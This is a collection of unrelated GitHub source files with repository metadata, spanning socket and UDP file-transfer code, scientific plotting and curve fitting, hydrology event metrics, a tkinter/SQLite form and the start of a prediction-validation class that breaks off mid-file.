list:\n\t\t\t\t\t\tfor item in data[key]:\n\t\t\t\t\t\t\tif type(item) == dict:\n\t\t\t\t\t\t\t\tqueue.append(item)\n\t\t\t\t\telse:\n\t\t\t\t\t\tcontinue\n\t\t\t\texcept:\n\t\t\t\t\tcontinue\n\t\treturn result\n\n\t# in: 657:17:0\n\t# out: 657, 674\n\tdef srcToPos(self, _src):\n\t\ttemp = _src.split(\":\")\n\t\treturn int(temp[0]), int(temp[0]) + int(temp[1])","repo_name":"xf97/HuangGai","sub_path":"src/contractExtractor/NonpublicVarAccessdByPublicFuncExtractor/judgeAst.py","file_name":"judgeAst.py","file_ext":"py","file_size_in_byte":6240,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"21"} +{"seq_id":"2071351417","text":"from sqlite3 import connect\nfrom .types import IPV4Connection\nimport socket\nimport threading\nfrom sys import exit\nfrom .types import ActionV1\n\nserver_thread = None\nstart_thread = None\ncontinue_serving = True\n\ndef new_conn(socket, callback_fn):\n global continue_serving\n while continue_serving:\n sock, address = socket.accept()\n actual_data = 
None\n try:\n data_len = int.from_bytes(sock.recv(4), \"little\")\n actual_data = sock.recv(data_len)\n except:\n continue\n \n if actual_data is not None:\n action = ActionV1(0,\"\",\"\",0.0)\n if action.decode_from(actual_data.decode(\"utf-8\")):\n callback_fn(action)\n\ndef start(connection, callback_fn):\n if not isinstance(connection, IPV4Connection):\n raise Exception(\"Connection must be an IPV4Connection\")\n\n global server_thread\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.bind((connection.address, connection.port))\n sock.listen(5)\n server_thread = threading.Thread(target=new_conn, args=(sock, callback_fn))\n server_thread.start()\n\ndef control_server_start(connection, callback_fn):\n global start_thread\n start_thread = threading.Thread(target=start, args=(connection, callback_fn))\n start_thread.start()\n \ndef control_server_stop():\n global continue_serving\n continue_serving = False\n try:\n server_thread.join()\n start_thread.join()\n except:\n exit(0)\n","repo_name":"monolith-network/pycrate","sub_path":"pycrate/control_server.py","file_name":"control_server.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2972033442","text":"#Mehmet Salih ÇELİK - 170401073\r\nimport socket\r\nimport os\r\nimport sys\r\nimport time\r\n\r\nsunucu_port=42\r\nbuffer=32768\r\n#buffer boyutum 32KB\r\nistemci_socket=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\r\nistemci_socket.settimeout(3)\r\n#baglanti kontrolu icin sure 3 saniye\r\n\r\n\r\n\r\ndef decode_yap(x):\r\n return x.decode(\"utf-8\")\r\n\r\ndef encode_yap(x):\r\n return x.encode(\"utf-8\")\r\n\r\n\r\n###Sunucu baglantisi ve sunucu_dosyalari klasorunu ekrana yazdirma islemi\r\nwhile 1:\r\n sunucu_ip=str(input(\"Baglanilmak istenen sunucu ip sini giriniz : \"))\r\n sunucu = (sunucu_ip, sunucu_port)\r\n mesaj=\"\"\r\n mesaj=encode_yap(sunucu_ip)\r\n try:\r\n istemci_socket.sendto(mesaj,sunucu)\r\n yenimesaj,sunucu_ip=istemci_socket.recvfrom(buffer)\r\n yenimesaj=decode_yap(yenimesaj)\r\n except:\r\n print(\"Hatali ip girisi yapildi veya sunucudan yanit alinamiyor.\")\r\n a=str(input(\"Yeniden denemek icin 1 , cikmak icin herhangi bir tusa basin : \"))\r\n if a==\"1\":\r\n continue\r\n else:\r\n break\r\n\r\n print(\"BAGLANTI BASARILI \\n\")\r\n print(yenimesaj)\r\n sunucudaki_dosyalar=yenimesaj\r\n istemcideki_dosyalar=os.listdir(\"istemci_dosyalari\")\r\n\r\n### Burada kullanici dogru komut girmis mi veya dogru dosya adi girmis mi kontrolu yapiyorum.\r\n mesaj = str(input(\"--- Yapilmak istenen islemi, dosya ismini ve uzantisini yaziniz.(GET abc.jpg , PUT xyz.txt) --- \\n\"))\r\n if mesaj[:3] != \"GET\" and mesaj[:3] != \"PUT\":\r\n print(\"Yanlis komut kullandiniz...\")\r\n a = str(input(\"Menuye donmek icin 1 , cikmak icin herhangi bir tusa basin : \"))\r\n if a == \"1\":\r\n mesaj = encode_yap(\"1\")\r\n istemci_socket.sendto(mesaj, sunucu)\r\n continue\r\n else:\r\n mesaj=encode_yap(mesaj)\r\n istemci_socket.sendto(mesaj, sunucu)\r\n break\r\n elif mesaj[:3]==\"GET\" and mesaj[4:] in sunucudaki_dosyalar:\r\n mesaj2 = encode_yap(mesaj)\r\n istemci_socket.sendto(mesaj2, sunucu)\r\n\r\n elif mesaj[:3]==\"PUT\" and mesaj[4:] in istemcideki_dosyalar:\r\n mesaj2 = encode_yap(mesaj)\r\n istemci_socket.sendto(mesaj2, sunucu)\r\n else:\r\n print(\"Olmayan bir dosya adi girdiniz...\")\r\n a = str(input(\"Menuye donmek icin 1 , cikmak icin herhangi bir tusa basin : \"))\r\n if a == \"1\":\r\n mesaj = 
encode_yap(\"1\")\r\n istemci_socket.sendto(mesaj, sunucu)\r\n continue\r\n else:\r\n mesaj=encode_yap(mesaj)\r\n istemci_socket.sendto(mesaj, sunucu)\r\n break\r\n\r\n###Sunucudan dosya boyutunu mesaj olarak alıyoruz.Dosya boyutu kadar byte'ı indirme islemi yapıyoruz ve aynı isimde bir dosya olusturup byte'ları yazıyoruz.\r\n if mesaj[:3]==\"GET\":\r\n veri, sunucu_ip = istemci_socket.recvfrom(buffer)\r\n dosya_boyutu=decode_yap(veri)\r\n print(\"indirilecek dosya boyutu : \",dosya_boyutu,\"byte\")\r\n f = open(\"istemci_dosyalari/\"+mesaj[4:], \"wb\")\r\n boyut_kontrol = 0\r\n while True:\r\n if ((boyut_kontrol*buffer)= int(dosya_boyutu):\r\n print(\"YOLLANDI.\")\r\n f.close()\r\n\r\n a = str(input(\"Menuye donmek icin 1 , cikmak icin herhangi bir tusa basin : \"))\r\n if a == \"1\":\r\n continue\r\n else:\r\n break\r\n\r\n\r\n\r\nistemci_socket.close()","repo_name":"nyucel/blm304","sub_path":"vize/170401073/client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4994,"program_lang":"python","lang":"tr","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"39087524303","text":"import csv_temperature\nfrom matplotlib import pyplot as plt\n\n\ndef plot_temperature(highs_temp, lows_temp, dates, unit):\n # Plotting the data\n fig = plt.figure(dpi=128, figsize=(10, 6))\n plt.plot(dates, highs_temp, c='red', alpha=0.5)\n plt.plot(dates, lows_temp, c='blue', alpha=0.5)\n plt.fill_between(dates, highs_temp, lows_temp, facecolor='green', alpha=0.1)\n # Formatating the chart\n plt.title('Daily high and low temperatures', fontsize=16)\n plt.xlabel('', fontsize=14)\n fig.autofmt_xdate()\n plt.ylabel('Temperature (°{})'.format(unit.title()), fontsize=12)\n plt.tick_params(axis='both', labelsize=10)\n plt.xlim(dates[0], dates[-1])\n plt.grid()\n plt.show()\n\n\ndef subplot_temp(filename1, filename2, unit):\n if unit.title() == 'C':\n dates1, highs1, lows1 = csv_temperature.convert_temperature(filename1)\n dates2, highs2, lows2 = csv_temperature.convert_temperature(filename2)\n limy = (-13, 50)\n if unit.title() == 'F':\n dates1, highs1, lows1 = csv_temperature.get_highs_lows(filename1)\n dates2, highs2, lows2 = csv_temperature.get_highs_lows(filename2)\n limy = (10, 120)\n fig = plt.figure(dpi=128, figsize=(10, 6))\n\n ax1 = plt.subplot(211)\n plt.plot(dates1, highs1, c='red', alpha=0.5)\n plt.plot(dates1, lows1, c='blue', alpha=0.5)\n plt.fill_between(dates1, highs1, lows1, facecolor='green', alpha=0.1)\n plt.setp(ax1.get_xticklabels(), visible=False)\n plt.title('Daily high and low temperatures Sitka - 2014', fontsize=16)\n fig.autofmt_xdate()\n plt.ylabel('Temperature (°{})'.format(unit.title()), fontsize=12)\n plt.tick_params(axis='both', labelsize=10)\n plt.xlim(dates1[0], dates1[-1])\n plt.ylim(limy)\n plt.grid()\n\n ax2 = plt.subplot(212, sharex=ax1)\n plt.plot(dates2, highs2, c='red', alpha=0.5)\n plt.plot(dates2, lows2, c='blue', alpha=0.5)\n plt.fill_between(dates2, highs2, lows2, facecolor='green', alpha=0.1)\n plt.setp(ax1.get_xticklabels(), fontsize=14)\n plt.title('Daily high and low temperatures Death Valley - 2014', fontsize=16)\n fig.autofmt_xdate()\n plt.ylabel('Temperature (°{})'.format(unit.title()), fontsize=12)\n plt.tick_params(axis='both', labelsize=10)\n plt.xlim(dates2[0], dates2[-1])\n plt.ylim(limy)\n plt.grid()\n\n 
plt.show()\n","repo_name":"gabriel19913/cvs_temperature_plotting","sub_path":"temperature_plot.py","file_name":"temperature_plot.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"15443900943","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom uncertainties import ufloat\nfrom scipy.optimize import curve_fit\nfrom texutils.table import TexTable\n\n\n#theta_P is the polarizer angle\ntheta_P, U_max, U_min = np.genfromtxt('data/kontrast.txt', unpack=True)\n\n#convert it to radians\ntheta_P = theta_P / 360 * (2*np.pi)\n\nZ = U_max-U_min\nN = U_max+U_min\n\n\ndef Fitf(theta, a, b, c, d):\n    return np.abs(a*np.sin(b*theta + c)) + d\n\n\nKontr = Z/N\n\nparams, cov = curve_fit(Fitf, theta_P, Kontr)\nerrors = np.sqrt(np.diag(cov))\na = ufloat(params[0], errors[0])\nb = ufloat(params[1], errors[1])\nc = ufloat(params[2], errors[2])\nd = ufloat(params[3], errors[3])\n\n\nx = np.linspace(-0.4, 3.5, 1000)\n\ntheta = (np.pi/2 - c)/b\n\nprint('the fit parameters are:')\nprint(a)\nprint(b)\nprint(c)\nprint(d,'\\n')\n\nprint('---------------')\nprint(theta * 360 / (2 * np.pi))\nprint('this is the best angle, the one with the largest contrast')\nprint('achievable in the experiment. we used 130° instead,')\nprint('because this value had not been calculated at the start.')\n\nplt.plot(theta_P, Kontr, 'r+', label=\"Data\")\nplt.plot(x, Fitf(x, *params), 'b', label=\"Regression\")\nplt.xlabel(r\"$\\theta_P \\, / \\, \\mathrm{rad}$\")\nplt.ylabel('K')\nplt.xticks([0, 0.5*np.pi, np.pi], ['0', r'$\\frac{\\pi}{2}$', r'$\\pi$'])\nplt.xlim(-0.4, 3.5)\nplt.ylim(0, 1)\nplt.tight_layout()\nplt.legend(loc=\"best\")\nplt.savefig(\"build/Kontrast.pdf\")\nplt.clf()\n\n\n##########\n# Table\n##########\nwinkel, umax, umin, kontrast = np.genfromtxt('data/gesicherte_messwerte/kontrast_(Kopie).txt', unpack=True)\n\nprint('-------------')\nt = TexTable([winkel, umax, umin, kontrast], [r\"Angle / $°$\", r\"$U_\\text{max}$ / mV\", r\"$U_\\text{min}$ / mV\", r\"Contrast\"],\n            label='tab:Kontrast',\n            caption='Measured values of the different voltages.')\nt.set_row_rounding(0, 0) #row index and number of decimal places\nt.set_row_rounding(1, 0)\nt.set_row_rounding(2, 0)\nt.set_row_rounding(3, 4)\n\nt.write_file('build/tabKontrast.tex')\nprint('The contrast table has been written!\\n')","repo_name":"smrakais/Master-Praktikum","sub_path":"v64/kontrast.py","file_name":"kontrast.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"23699298519","text":"import warnings\n\nfrom .core import MetaRegister\n\ndef analyze_node(node):\n    tagname = node.tag[0].upper() + node.tag[1:]\n    try:\n        tagclass = MetaRegister.registry[tagname]\n    except KeyError:\n        warnings.warn('{0} is not implemented'.format(tagname))\n        return\n    return tagclass(node)\n","repo_name":"saltduck/pyBPMN","sub_path":"bpmn/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"}
{"seq_id":"2078689918","text":"import pandas as pd\nimport numpy as np\nimport datetime\nfrom src.h_index import get_h_index\n\ndef get_event_matrix(Events, data_P, data_full):\n    h = get_h_index(Events) # calc h index\n    discharge_DF = get_discharge_metrics(Events, data_full) # Calc discharge related metrics\n    turb_DF = get_turb_metrics(Events)\n    load_DF = 
get_load_metrics(Events, data_full)\n rainfall_DF = get_rainfall_metrics(data_P, discharge_DF) # discharge_DF provides the events (times)\n Full_featuresDF = h.join(discharge_DF).join(turb_DF).join(load_DF).join(rainfall_DF)\n\n # Remove unused columns\n Full_featuresDF.drop(labels = [('Q_Event','TimePeakQ'),('Q_Event','TimePeakQf'), ('Q_Event','TimeStartQ'), ('T_Event','TimePeakT')], axis = 1, inplace = True)\n \n return Full_featuresDF\n\n\ndef get_discharge_metrics(data, data_full):\n EventDF = data.groupby('Event_ID')['Qcms'].max().rename('peakFlow').to_frame().join( #add peakFlow\n data.groupby('Event_ID')['Qcms'].idxmax().rename('TimePeakQ')).join( # add time of peak flow\n data.groupby('Event_ID')['Q_qf'].idxmax().rename('TimePeakQf')).join(# add time of peak quick flow\n data.reset_index().groupby('Event_ID')['Date'].first().rename('TimeStartQ'))# add starting time\n start_flow = data.groupby('Event_ID')['Qcms'].first() \n EventDF['Hours2Peak'] = [t.total_seconds()/3600 for t in EventDF['TimePeakQ'].subtract(EventDF['TimeStartQ'])] # add time to peak\n EventDF['DeltaQ'] = EventDF['peakFlow'] - start_flow \n\n # Quick Flow and base flow params:\n EventDF = EventDF.join(data.groupby('Event_ID').apply(dischargeStats, \n colQ = 'Qcms',\n colBF = 'Q_bf',\n colT = 'combinedTurb',\n col_load = 'load_mgs',\n max_nan = 1 # nan values already checked\n ).droplevel(1,axis = 0))\n EventDF.columns = pd.MultiIndex.from_product([['Q_Event'],EventDF.columns]) # add second column index\n\n\n # Discharge antecedent features\n AntecedentDF = data.groupby('Event_ID')['Qcms'].first().rename('startFlow').to_frame()\n cum_disch = pd.DataFrame()\n cum_disch['cum_Qcm_10D'] = data_full.Qcms.multiply(60*15).rolling('10D', min_periods= round(24*4*0.9)).sum()\n cum_disch['cum_Qcm_15D'] = data_full.Qcms.multiply(60*15).rolling('15D', min_periods= round(24*4*0.9)).sum()\n cum_disch['cum_Qcm_20D'] = data_full.Qcms.multiply(60*15).rolling('20D', min_periods= round(24*4*0.9)).sum()\n cum_disch['cum_Qcm_25D'] = data_full.Qcms.multiply(60*15).rolling('25D', min_periods= round(24*4*0.9)).sum()\n cum_disch['cum_Qcm_30D'] = data_full.Qcms.multiply(60*15).rolling('30D', min_periods= round(24*4*0.9)).sum()\n\n AntecedentDF = AntecedentDF.join( cum_disch.loc[EventDF[('Q_Event','TimeStartQ')],:].set_index(EventDF.index) )\n AntecedentDF.columns = pd.MultiIndex.from_product([['Q_Antecedent'],AntecedentDF.columns]) # add second column index\n\n Discharge_DF = EventDF.join(AntecedentDF)\n\n return Discharge_DF\n\ndef get_turb_metrics(data):\n # TurbDF = data.groupby('Event_ID')['combinedTurb'].agg(peakTurb = 'max', meanTurb = 'mean') # peak and mean turbidity\n TurbDF = data.groupby('Event_ID').apply(turbStats \n , colQ = 'Qcms'\n , colBF = 'Q_bf'\n , colT = 'combinedTurb'\n , col_load = 'load_mgs'\n , max_nan = 1 # nan values already checked\n ).droplevel(1, axis = 0)\n\n TurbDF['TimePeakT'] = data.groupby('Event_ID')['combinedTurb'].idxmax().rename('TimePeakT') # time at peak T\n TurbDF['QatTpeak'] = data.loc[TurbDF['TimePeakT'],'Qcms'].to_frame().set_index(TurbDF.index) # Q at peak T\n \n TurbDF.columns = pd.MultiIndex.from_product([['T_Event'],TurbDF.columns])\n\n return TurbDF\n\ndef get_rainfall_metrics(data_P, Discharge_DF):\n #reference time for P metrics:\n hours_after_Q_peak = 4 #end of event for P event-related mmetrics\n days_before_start = 1 # start of event for P antecedent-related metrics\n\n # Event and antecedent Parameters in the Precip dataframe: \n # Event-related Accumulated P \n data_P['P_10h_acum'] = 
data_P.precip.rolling(10 + hours_after_Q_peak, min_periods=round(10 * 0.9)).sum()\n data_P['P_11h_acum'] = data_P.precip.rolling(11 + hours_after_Q_peak, min_periods=round(11 * 0.9)).sum()\n data_P['P_12h_acum'] = data_P.precip.rolling(12 + hours_after_Q_peak, min_periods=round(12 * 0.9)).sum()\n data_P['P_13h_acum'] = data_P.precip.rolling(13 + hours_after_Q_peak, min_periods=round(13 * 0.9)).sum()\n data_P['P_14h_acum'] = data_P.precip.rolling(14 + hours_after_Q_peak, min_periods=round(14 * 0.9)).sum()\n data_P['P_15h_acum'] = data_P.precip.rolling(15 + hours_after_Q_peak, min_periods=round(15 * 0.9)).sum()\n\n # Event-related Intensity\n data_P['P_12h_max_i'] = data_P.precip.rolling('12H').max() #Max intensity value in the period\n data_P['P_15h_max_i'] = data_P.precip.rolling('15H').max() #Max intensity value in the period\n data_P['P_12h_mean_i'] = data_P.precip.replace({0:np.nan}).rolling('12H').mean().replace({np.nan:0}) #mean intensity when rain !=0\n data_P['P_15h_mean_i'] = data_P.precip.replace({0:np.nan}).rolling('15H').mean().replace({np.nan:0}) #mean intensity when rain !=0\n\n # dates to sample P metrics:\n relevant_dates_event = [t.ceil('H') + datetime.timedelta(hours = hours_after_Q_peak) for t in Discharge_DF[('Q_Event','TimePeakQ')]]\n # relevant_dates = [t.ceil('H') for t in DF_h['StartTimeQ']] \n\n P_event_DF = data_P.loc[relevant_dates_event].drop(['HourlyPrecipitation','TFlag','precip','sFlag','missFlag'],axis=1).set_index(Discharge_DF.index)\n P_event_DF.columns = pd.MultiIndex.from_product([['P_event'],P_event_DF.columns])\n\n\n # Antecedent P\n anteced_P = pd.DataFrame()\n\n anteced_P['P_50d_acum'] = data_P.precip.rolling('50D', min_periods= round(50*24 * 0.9)).sum()\n anteced_P['P_40d_acum'] = data_P.precip.rolling('40D', min_periods = round(40*24 * 0.9)).sum()\n anteced_P['P_30d_acum'] = data_P.precip.rolling('30D', min_periods = round(30*24 * 0.9)).sum()\n anteced_P['P_25d_acum'] = data_P.precip.rolling('25D', min_periods = round(25*24 * 0.9)).sum()\n anteced_P['P_20d_acum'] = data_P.precip.rolling('20D', min_periods = round(20*24 * 0.9)).sum()\n\n # dates to sample P antecedent metrics:\n relevant_dates_anteced = [t.ceil('H') - datetime.timedelta(days = days_before_start) for t in Discharge_DF[('Q_Event','TimeStartQ')]]\n\n\n P_antec_DF = anteced_P.loc[relevant_dates_anteced].set_index(Discharge_DF.index)\n P_antec_DF.columns = pd.MultiIndex.from_product([['P_antec'],P_antec_DF.columns])\n\n P_DF= P_event_DF.join(P_antec_DF)\n \n return P_DF\n\ndef get_load_metrics(data, data_full):\n Event_time_start = data.reset_index().groupby('Event_ID')['Date'].first().rename('TimeStartQ')\n\n load_df = data.groupby('Event_ID').apply(loadStats \n , colQ = 'Qcms'\n , colBF = 'Q_bf'\n , colT = 'combinedTurb'\n , col_load = 'load_mgs'\n , max_nan = 1 # nan values already checked\n ).droplevel(1, axis = 0)\n\n load_df.columns = pd.MultiIndex.from_product([['Load_Event'],load_df.columns])\n\n #Antecedent Conditions\n # Antecedent conditions\n load = pd.DataFrame()\n load['load_15D'] = data_full.load_mgs.multiply(60*15).rolling('15D', min_periods= round(24*4*0.9)).sum()\n load['load_20D'] = data_full.load_mgs.multiply(60*15).rolling('20D', min_periods= round(24*4*0.9)).sum()\n load['load_25D'] = data_full.load_mgs.multiply(60*15).rolling('25D', min_periods= round(24*4*0.9)).sum()\n load['load_30D'] = data_full.load_mgs.multiply(60*15).rolling('30D', min_periods= round(24*4*0.9)).sum()\n load['load_40D'] = data_full.load_mgs.multiply(60*15).rolling('40D', min_periods= 
round(24*4*0.9)).sum()\n\n    load_antec = load.loc[Event_time_start,:].set_index(Event_time_start.index)\n\n    load_antec.columns = pd.MultiIndex.from_product([['Load_antec'],load_antec.columns])\n\n    load_df = load_df.join(load_antec)\n\n    return load_df\n\ndef dischargeStats(df,colQ, colBF, colT, col_load, max_nan = 0.1):\n    full_len = len(df)\n    filtDF = df[[colQ, colBF, colT, col_load]].dropna() #filter over all discharge and load variables for consistency in metrics\n    newlen = len(filtDF)\n    \n    filtDF['qf'] = filtDF[colQ] - filtDF[colBF]\n    out_df = pd.DataFrame({\n        # total discharge params\n        'meanFlow':[filtDF[colQ].mean()],\n        'totFlow': [filtDF[colQ].sum()*(60*15)],\n        # Quick Flow params\n        'cum_qf': [filtDF['qf'].sum()*(60*15)],\n        'mean_qf': [filtDF['qf'].mean()],\n        'max_qf': [filtDF['qf'].max()],\n        #Base flow params\n        'cum_bf': [filtDF[colBF].sum()*(60*15)],\n        'mean_bf': [filtDF[colBF].mean()],\n        'max_bf': [filtDF[colBF].max()],\n    })\n    out_df['bf_qf_ratio']= out_df['cum_bf']/out_df['cum_qf']\n    out_df['bf_qf_peak_ratio'] = out_df['max_bf']/out_df['max_qf']\n    out_df['Tf_qf_ratio']= out_df['totFlow']/out_df['cum_qf']\n    out_df['Tf_qf_peak_ratio'] = filtDF[colQ].max()/out_df['max_qf']\n    out_df['Tf_bf_ratio']= out_df['totFlow']/out_df['cum_bf']\n    out_df['Tf_bf_peak_ratio'] = filtDF[colQ].max()/out_df['max_bf']\n    \n    if full_len-newlen > max_nan*full_len:\n        out_df.loc[:] = np.nan\n    return out_df\n    \ndef loadStats(df,colQ, colBF, colT, col_load, max_nan = 0.1):\n    full_len = len(df)\n    filtDF = df[[colQ, colBF, colT, col_load]].dropna() #filter over all discharge and load variables for consistency in metrics\n    newlen = len(filtDF)\n    out_df = pd.DataFrame({\n        #Load params\n        'maxLoad': [filtDF[col_load].max()],\n        'totalLoad': [filtDF[col_load].sum()],\n        'meanLoad': [filtDF[col_load].mean()],\n    })\n    \n    if full_len-newlen > max_nan*full_len:\n        out_df.loc[:] = np.nan\n    \n    return out_df\n    \ndef turbStats(df,colQ, colBF, colT, col_load, max_nan = 0.1):\n    full_len = len(df)\n    filtDF = df[[colQ, colBF, colT, col_load]].dropna() #filter over all discharge and load variables for consistency in metrics\n    newlen = len(filtDF)\n    out_df = pd.DataFrame({\n        #turb params\n        'peakTurb': [filtDF[colT].max()],\n        'meanTurb': [filtDF[colT].mean()],\n    })\n    \n    if full_len-newlen > max_nan*full_len:\n        out_df.loc[:] = np.nan\n    \n    return out_df","repo_name":"ArlexMR/Hysteresis-Analysis","sub_path":"src/event_metrics.py","file_name":"event_metrics.py","file_ext":"py","file_size_in_byte":11299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"20640668986","text":"import numpy as np\nfrom scipy import optimize\nimport matplotlib.pyplot as pl\n\ndef func(x, p):\n    \"\"\"\n    The model function used for the fit: A*sin(2*pi*k*x + theta)\n    \"\"\"\n    A, k, theta = p\n    return A*np.sin(2*np.pi*k*x + theta)\n\ndef residuals(p, y, x):\n    \"\"\"\n    Difference between the experimental data x, y and the fitted function; p holds the coefficients the fit has to find\n    \"\"\"\n    return y - func(x, p)\n\nx = np.linspace(0, 2*np.pi, 100)\nA, k, theta = 10, 0.34, np.pi/6  #true parameters of the underlying function\ny0 = func(x, [A, k, theta])  #noise-free data\n#experimental data with added noise\nnp.random.seed(0)\ny1 = y0 + 2 * np.random.randn(len(x))\n\np0 = [7, 0.40, 0] #initial guess for the fit parameters\n\n#call leastsq to fit the data\n#residuals is the function that computes the error\n#p0 is the initial parameter guess\n#args holds the experimental data to fit\n\nplsq = optimize.leastsq(residuals, p0, args=(y1, x))\n\nprint(u\"true parameters:\", [A, k, theta])\nprint(u\"fitted parameters:\", plsq[0])  #parameters obtained by fitting the experimental data\n\npl.plot(x, y1, \"o\", label=u\"noisy experimental data\")\n\npl.plot(x, y0, label=u\"true data\")\npl.plot(x, func(x, plsq[0]), 
label=u\"fitted data\")\npl.legend()\npl.show()\n","repo_name":"wanglongjuan/wlj-study","sub_path":"python-example/nihe2.py","file_name":"nihe2.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"3318720735","text":"# Copyright (C) 2018 Dan Tran\r\n\r\n# This program is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation; either version 2 of the License, or\r\n# (at your option) any later version.\r\n\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n\r\n# You should have received a copy of the GNU General Public License along\r\n# with this program; if not, write to the Free Software Foundation, Inc.,\r\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\r\n\r\nimport numpy as np\r\n\r\ndef J(X, y, w, b, l):\r\n    j = 0.0\r\n    for i in range(X.shape[0]):\r\n        j += np.log(1.0 + np.exp(-y[i] * (b + np.dot(X[i], w))))\r\n    return j / float(X.shape[0]) + l * np.linalg.norm(w, 2)\r\n\r\ndef error(X, y, w, b):\r\n    err = 0.0\r\n    for i in range(X.shape[0]):\r\n        if np.sign(b + np.dot(X[i], w)) != y[i]:\r\n            err += 1.0\r\n    return err / float(X.shape[0])\r\n","repo_name":"Dan-Tran/congress_classifier","sub_path":"metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"29276074705","text":"import tkinter\nimport sqlite3\n\nclass EnterPartPage(tkinter.Frame):\n\n    parts_ID_entry = None\n    parts_ID_field = None\n    peripheral_type_entry = None\n    peripheral_type_field = None\n\n    def __init__(self, parent, controller):\n        \"\"\" \n        Constructs a new page.\n\n        - parent : the parent class\n        - controller : the application\n        \"\"\"\n        tkinter.Frame.__init__(self, parent)\n        self.controller = controller # for switching between pages\n        self.populate_window(controller)\n\n    def populate_window(self, controller):\n        \"\"\" \n        Populates the page with elements and attributes.\n\n        - controller : the application\n        \"\"\"\n        self.create_header(controller, 'Enter computer peripheral information')\n        self.create_fields()\n        self.create_buttons(controller)\n\n    ############################### PAGE PROPERTIES ############################### \n\n    def create_header(self, controller, header):\n        \"\"\" \n        Creates a header for the current page.\n        \n        - controller : the application\n        - header : contents of the header\n        \"\"\"\n        label = tkinter.Label(self, text=header, font=controller.header_font)\n        label.pack(side='top', fill='x', pady=20)\n\n    def create_fields(self):\n        \"\"\" \n        Create fields for requesting user input \n        \"\"\"\n        # label and field for the parts ID\n        parts_ID_label = tkinter.Label(self, text='Parts ID', font=('Helvetica', 14))\n        parts_ID_label.pack()\n        self.parts_ID_entry = tkinter.StringVar()\n        self.parts_ID_field = tkinter.Entry(self, textvariable=self.parts_ID_entry)\n        self.parts_ID_field.pack()\n\n        # label and field for the peripheral type\n        peripheral_type_label = tkinter.Label(self, text='Type (mouse, keyboard, etc)', font=('Helvetica', 14))\n        peripheral_type_label.pack()\n        self.peripheral_type_entry = tkinter.StringVar()\n        self.peripheral_type_field = tkinter.Entry(self, 
textvariable=self.peripheral_type_entry)\n self.peripheral_type_field.pack()\n\n def create_buttons(self, controller):\n \"\"\" \n Creates buttons for the current page.\n \n - controller : the application\n \"\"\"\n submit_button = tkinter.Button(self, text='Submit information', font=controller.button_font,\n command=lambda: [self.run_query(), self.clear_fields()])\n submit_button.pack(pady=30)\n\n return_button = tkinter.Button(self, text='Return to view equipment', font=controller.button_font,\n command=lambda: controller.show_frame('EquipmentPage'))\n return_button.pack()\n\n ################################ EVENT HANDLERS ###################################\n\n def run_query(self):\n \"\"\"\n Runs a query which will insert all values\n from the page into the table.\n \"\"\"\n connection = sqlite3.connect('EduCycle.db')\n cursor = connection.cursor()\n\n # Get the tag number which was entered in the Equipment entry page\n cursor.execute('SELECT TU_Tag_Number FROM Equipment ORDER BY TU_Tag_Number DESC LIMIT 1') # gets the most recent tag number\n tu_tag_number = ''.join(cursor.fetchone()) # convert entry to a string\n\n # Get the current location which was entered in the Equipment entry page\n cursor.execute('SELECT Storage_Location FROM Equipment ORDER BY Storage_Location DESC LIMIT 1') # gets the most recent location number\n current_location = ''.join(cursor.fetchone()) # convert entry to a string\n\n cursor.execute(\"\"\"INSERT INTO Computer_Parts(PartsID, TU_Tag_Number, Parts_Type, current_location) \n VALUES (?, ?, ?, ?)\"\"\",\n (self.parts_ID_entry.get(), tu_tag_number, self.peripheral_type_entry.get(), current_location))\n\n connection.commit()\n connection.close()\n\n def clear_fields(self):\n \"\"\" \n Clears the fields for user input \n \"\"\"\n self.parts_ID_field.delete(0, 'end')\n self.peripheral_type_field.delete(0, 'end')\n","repo_name":"T-Visor/Educycle","sub_path":"application-contents/enterPartPage.py","file_name":"enterPartPage.py","file_ext":"py","file_size_in_byte":4191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24078857431","text":"from Prediction_Raw_Data_Validation.predictionDataValidation import Prediction_Data_validation\nfrom DataTypeValidation_Insertion_Prediction.DataTypeValidationPrediction import dBOperation\nfrom DataTransformation_Prediction.DataTransformationPrediction import dataTransformPredict\nfrom datetime import datetime as dt\nfrom log_insertion_to_db.log_insertion_to_db import log_insertion_to_db\n\n\nclass pred_validation:\n def __init__(self, client, resource, bucket):\n self.raw_data = Prediction_Data_validation(client, resource, bucket)\n self.dataTransform = dataTransformPredict(client, resource, bucket)\n self.dBOperation = dBOperation(client, resource, bucket)\n self.db_obj = log_insertion_to_db(\"PredictionMainLog\")\n\n def prediction_validation(self):\n\n try:\n\n #extracting values from prediction schema\n print(\"starting validation of files\")\n print(\"getting raw data values from schema\")\n LengthOfDateStampInFile,LengthOfTimeStampInFile,column_names,noofcolumns = self.raw_data.valuesFromSchema()\n print(\"got the schema\")\n #getting the 